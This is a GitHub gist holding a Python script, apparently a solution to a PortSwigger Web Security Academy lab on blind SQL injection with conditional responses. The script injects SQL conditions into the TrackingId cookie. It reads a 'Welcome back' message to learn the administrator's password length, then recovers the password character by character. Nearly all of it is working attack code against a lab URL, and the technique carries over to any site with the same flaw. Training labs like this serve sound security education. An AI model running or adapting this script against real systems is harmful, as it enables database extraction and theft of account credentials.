Last active
November 3, 2022 14:00
-
-
Save geoffchisnall/9d981bdeb6ef07482d41f19427c0f20f to your computer and use it in GitHub Desktop.
Blind SQL injection with conditional responses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
#https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses | |
#Script to get the password length and then get the password. | |
import requests,string | |
url = 'https://0a7a006b04e00d86c087908900db009f.web-security-academy.net' | |
s = requests.Session() | |
r = s.get(url) | |
tcookie = (r.cookies["TrackingId"]) | |
#print(tcookie) | |
cookievalue = '' | |
password = '' | |
characters = list(string.ascii_lowercase) | |
characters = characters + list(string.digits) | |
numbers = list(string.digits) | |
for n in range(1,30): | |
#print(n) | |
cookies = {'TrackingId':cookievalue} | |
payload = "' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=%s)='a;" % (n) | |
cookievalue = tcookie+payload | |
cookies = {'TrackingId':cookievalue} | |
#print(cookievalue) | |
#print(str(cookies)) | |
sr = requests.get(url, cookies=cookies) | |
response = sr.text | |
if "Welcome back" in response: | |
print("The password length is %s" % (n)) | |
for nl in range(1,n+1): | |
for char in characters: | |
#print(char) | |
payload_password = "' AND (SELECT SUBSTRING(password,%s,1) FROM users WHERE username='administrator') ='%s;" % (nl,char) | |
#print(payload_password) | |
cookievalue = tcookie+payload_password | |
cookies = {'TrackingId':cookievalue} | |
#print(cookievalue) | |
#print(str(cookies)) | |
sr1 = requests.get(url, cookies=cookies) | |
response = sr1.text | |
if "Welcome back" in response: | |
#print(char) | |
print("digit found: %s" % (char)) | |
#else: | |
password = password + char | |
print("Administrator password is: " + password) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment